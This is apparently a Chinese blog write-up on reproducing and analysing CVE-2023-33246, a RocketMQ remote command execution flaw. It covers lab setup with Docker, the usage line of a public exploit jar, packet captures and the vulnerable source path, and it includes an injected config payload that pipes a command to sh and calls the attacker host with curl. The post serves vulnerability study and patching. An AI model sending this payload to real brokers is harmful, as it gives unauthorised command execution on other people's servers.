CVE-2023-33246 RocketMQ RCE漏洞

已于 2023-12-21 11:11:08 修改
阅读量1.3k 收藏 10
点赞数 10
分类专栏: 漏洞复现 文章标签: rocketmq spring cloud spring 后端 安全 漏洞复现
于 2023-12-21 11:09:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mirocky/article/details/135125863
版权

一、RocketMQ简介

RocketMQ是一款纯java、分布式、队列模型的开源消息中间件,主要用于在分布式系统中进行异步消息传递,支持事务消息、顺序消息、批量消息、定时消息、消息回溯等功能。
在这里插入图片描述

RocketMQ有四个核心组成部分:
NameServer:RocketMQ的服务注册中心,用于保存Broker相关元信息;
Broker:消息存储中心,接收并存储Producer的消息,Consumer从此处获得信息,Master节点可写可读,Slave节点不可写只可读;
Producer:消息生产者;
Consumer:消息消费者。 在这里插入图片描述

二、漏洞影响范围

Apache RocketMQ <= 5.1.0
Apache RocketMQ <= 4.9.5

三、环境搭建

1、拉取镜像

docker pull apache/rocketmq:4.9.1
docker pull apacherocketmq/rocketmq-console:2.0.0

在这里插入图片描述

2、启动namesrv

docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv

在这里插入图片描述

3、创建目录并配置broker文件

mkdir -p /mydata/rocketmq/conf/
vi /mydata/rocketmq/conf/broker.conf

在这里插入图片描述

粘贴以下内容

brokerClusterName = DefaultCluster 
brokerName = broker-a 
brokerId = 0 
deleteWhen = 04 
fileReservedTime = 48 
brokerRole = ASYNC_MASTER 
flushDiskType = SYNC_FLUSH
brokerIP1 = X.X.X.X    #主机IP

在这里插入图片描述

4、启动broker和console

docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /mydata/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf


docker run -d --name rmqconsole -p 8899:8080 --link rmqnamesrv:namesrv\
 -e "JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876\
 -Dcom.rocketmq.sendMessageWithVIPChannel=false"\
 -t apacherocketmq/rocketmq-console:2.0.0

在这里插入图片描述
访问8899端口
在这里插入图片描述
成功访问

四、漏洞复现

EXP地址:
https://github.com/Serendipity-Lucky/CVE-2023-33246

命令:

java -jar CVE-2023-33246.jar -ip "目标IP" -cmd "需要执行的命令"

远程命令执行:
在这里插入图片描述

五、漏洞分析

1、数据交互过程

使用wireshark查看10.88.80.137(靶机)和10.88.80.119(攻击机)之间的数据传输:

首先是exp向NameServer请求Broker节点的信息:

{
    "code": 105,
    "extFields": {"topic": "TBW102"},
    "flag": 0,
    "language": "JAVA",
    "opaque": 1,
    "serializeTypeCurrentRPC": "JSON",
    "version": 395
}

在这里插入图片描述

然后NameSever返回Broker节点信息:

{
    "brokerDatas":[{
        "brokerAddrs":{0: "10.88.80.137:10911"},
        "brokerName":"broker-a",
        "cluster":"DefaultCluster"
    }],
    "filterServerTable":{},
    "queueDatas": [{
        "brokerName":"broker-a",
        "perm":7,
        "readQueueNums":8,
        "topicSysFlag":0,
        "writeQueueNums":8
    }]
}

在这里插入图片描述

这之后,EXP仿冒Console节点,访问NameSerber节点获取注册Broker数据,而不需要鉴权,且数据明文传输。

filterServerNums=1
rocketmqHome=-c $@|sh . echo curl http://10.88.80.119;

在这里插入图片描述

2、EXP分析

利用DefaultMQAdminExt未鉴权的特征,使用updateBrokerConfig函数将构建的payload向Broker节点发送。
在这里插入图片描述

3、源码分析

https://rocketmq.apache.org/download/ 选择下载4.9.1 Source版本。

updateBrokerConfig() -> getConfiguration().update() 链中没有对输入校验
在这里插入图片描述
在这里插入图片描述
exp打入一次后会一直执行,推测调用props为另一条链
在这里插入图片描述
搜索exec找到callShell
在这里插入图片描述搜索callShell找到createFilterServer
在这里插入图片描述
其中buildStartCommand如下
在这里插入图片描述
在payload中,对rocketmqhome进行了赋值,故此处命令拼接造成远程命令执行。

六、修复方式

https://rocketmq.apache.org/download/ 选择下载4.9.6 Source版本。

直接把callShell删掉了
在这里插入图片描述

连人
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache RocketMQ RCE漏洞复现(CVE-2023-33246)
0xSec
06-01 9401
RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。
漏洞复现】Apache RocketMQ 命令注入漏洞CVE-2023-33246
做自己喜欢的事,并将其发挥到极致!
06-11 4854
RocketMQ是一款分布式消息中间件,专为万亿级超大规模的消息处理而设计,具有高吞吐量、低延迟、海量堆积、顺序收发等特点。同时它是一个分布式消息和流数据平台。在RocketMQ 5.1.0及以下版本在一定条件下,会存在远程命令执行风险;由于RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外攻击者还可以通过伪造 RocketMQ 协议内容来达到同样的效果。
Apache RocketMQ 远程代码执行漏洞CVE-2023-33246
蚁景网安学院
08-01 552
RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件外网泄露,缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。 此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。
CVE-2023-33246命令执行复现分析
蚁景网安学院
06-19 767
RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力,同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。
Apache ShardingSphere ElasticJob-UI敏感信息泄漏到RCECVE-2022-22733)
最新发布
qq_23003811的博客
07-24 236
Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。2、使用用户密码guest/guest登录,抓包返回管理员账号密码root/root。5、把shell.sql传到自己的vps服务器,并开启临时http服务。1、登录框账号密码爆破,获得普通用户密码guest/guest。7、在后台传shell,点击Test connect测试连接。
漏洞复现-CVE-2023-33246 Apache RocketMQ RCE漏洞原理与复现
关注网络安全、云原生安全
07-15 3414
服务端管理员调用的接口没有鉴权,且将内容直接拼接到执行的命令,没有做过滤。
CVE-2023-33246 Apache RocketMQ 命令注入漏洞复现及分析
牛叫兽的测试学习和分享
06-02 9279
CVE-2023-33246 漏洞复现及分析
CVE-2023-33246 Apache RocketMQ RCE
sash1mi
06-02 1433
Apache RocketMQ是一款开源的分布式消息和流处理平台,提供了高效、可靠、可扩展的低延迟消息和流数据处理能力,广泛用于异步通信、应用解耦、系统集成以及大数据、实时计算等场景。漏洞的官方描述为当RocketMQ多个组件,包括NameServer、Broker和Controller,都暴露在外网,并且缺乏有效的身份认证机制,那么攻击者可以利用更新配置功能,以RocketMQ运行的系统用户身份执行命令。
Apache RocketMQ 命令注入漏洞(含批量验证poc)
weixin_43567873的博客
04-03 219
Apache RocketMQ 命令注入漏洞(含批量验证poc)
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
Apache RocketMQ 命令注入漏洞(含批量验证poc),劲爆
2401_83974173的博客
04-13 525
漏洞存在于Apache RocketMQ中,是一个远程命令执行漏洞RocketMQ的NameServer、Broker、Controller等多个组件缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。
探索CVE-2023-33246安全漏洞的深度剖析与防御策略
gitblog_00039的博客
04-07 386
探索CVE-2023-33246安全漏洞的深度剖析与防御策略 项目地址:https://gitcode.com/Le1a/CVE-2023-33246 项目简介 CVE-2023-33246 是一个公开的开源项目,旨在研究和解决最近发现的安全漏洞。该项目详细记录了这个特定漏洞的成因、影响范围,以及如何预防和修复的方法,对于开发者、安全研究员以及系统管理员来说,是一个极具价值的学习资源。 技术分析...
探索 CVE-2023-33246:一款用于网络安全研究的开源工具
gitblog_00022的博客
04-02 286
探索 CVE-2023-33246:一款用于网络安全研究的开源工具 项目地址:https://gitcode.com/SuperZero/CVE-2023-33246 在网络安全领域,了解并修复漏洞是至关重要的工作。CVE-2023-33246 是一个由 SuperZero 开发的开源项目,旨在帮助研究人员和开发者更好地理解和应对特定的安全漏洞。本文将深入探讨该项目的技术细节、应用场景及其独特之处...
CVE-2023-33246 RCE漏洞复现
七堇年的博客
06-08 2063
RocketMQ 5.1.0及以下版本在一定条件下,会存在远程命令执行风险;由于RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外攻击者还可以通过伪造 RocketMQ 协议内容来达到同样的效果。
Fastjson官方再次披露高危漏洞,包括rocketmq、jeecg-boot等近15%的github开源项目受影响
murphysec的博客
05-23 2972
2022年5月23日,fastjson 官方发布安全通报,fastjson <= 1.2.80 存在反序列化任意代码执行漏洞,可能会导致远程服务器被攻击,风险影响较大。建议使用了 fastjson 的用户尽快采取安全措施保障系统安全。 Fastjson 是Java语言实现的快速JSON解析和生成器。 fastjson 使用黑白名单用于防御反序列化漏洞,1.2.80及以下版本在特定条件下可绕过默认autoType关闭限制,攻击远程服务器。 攻击者可利用该漏洞远程执行恶意代码。 漏洞评级:严重
CVE-2023-33246
07-29
CVE-2023-33246是Apache RocketMQ的命令注入漏洞。通过注入特定的命令,攻击者可以在受影响的版本内执行远程命令。\[2\]在漏洞利用的示例中,通过注入echo命令并写入文件的方式来证明漏洞的存在。\[1\]具体来说,攻击者可以通过构造恶意请求,在命令中注入恶意代码,从而执行任意命令。该漏洞的危害评级为高危。\[2\]受影响的版本包括Apache RocketMQ 5.x <= 5.1.0和4.x <= 4.9.6。\[2\]目前尚未公开的修复补丁。\[2\]因此,建议用户及时关注Apache RocketMQ安全公告,并采取相应的安全措施来保护系统免受此漏洞的影响。 #### 引用[.reference_title] - *1* *2* *3* [CVE-2023-33246 Apache RocketMQ 命令注入漏洞复现及分析](https://blog.csdn.net/jdhellfire/article/details/131009358)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值